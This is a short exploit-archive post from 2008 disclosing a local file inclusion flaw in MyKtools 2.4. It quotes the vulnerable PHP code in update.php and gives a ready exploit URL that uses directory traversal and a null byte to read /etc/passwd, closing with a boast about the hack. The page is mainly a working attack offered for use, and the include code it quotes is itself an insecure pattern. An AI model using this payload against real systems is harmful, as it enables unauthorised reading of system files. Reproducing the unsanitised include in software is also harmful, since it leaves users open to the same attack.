[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MyKtools 2.4 (langage) Local File Inclusion Vulnerability
# Published : 2008-10-27
# Author : x0r
# Previous Title : e107 Plugin alternate_profiles (id) SQL Injection Vulnerability
# Next Title : e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit


##############
# Autor: x0r
#
# Email: evolutionteam.x0[at]gmail[dot]com
#
# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip
#
# Bug: LFI
##############

Bug:

In update.php

// Include du fichier langue
if ($_GET['langage'])
{
$langue = $_GET['langage'];
include ("lang/".$langue.".php");
}

Exploit: update.php?langage=../../../../../../etc/passwd%00

p0wn3d Beby.

-=EOF=-

# www.Syue.com [2008-10-27]